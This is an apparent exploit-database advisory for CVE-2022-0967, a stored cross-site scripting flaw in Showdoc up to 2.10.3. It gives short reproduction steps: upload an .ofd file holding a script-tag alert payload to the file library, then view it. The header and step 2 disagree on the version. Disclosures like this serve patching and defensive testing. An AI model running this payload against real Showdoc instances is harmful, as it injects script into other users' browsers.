Showdoc 2.10.3 Exploit, Stored Cross-Site Scripting (XSS)

# Exploit Title: Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Akshay Ravi
# Vendor Homepage: https://github.com/star7th/showdoc
# Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.3
# Version: <= 2.10.3
# Tested on: macOS Monterey
# CVE : CVE-2022-0967

Description: Stored XSS via uploading file in .ofd format

1. Create a file with .ofd extension and add XSS Payload inside the file

	filename = "payload.ofd"
	payload = "<script>alert(1)</script>"

2. Login to showdoc v2.10.2 and go to file library

	Endpoint = "https://www.site.com/attachment/index"

3. Upload the payload on file library and click on the check button
4. The XSS payload will executed once we visited the URL

All rights reserved nPulse.net 2009 - 2022
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD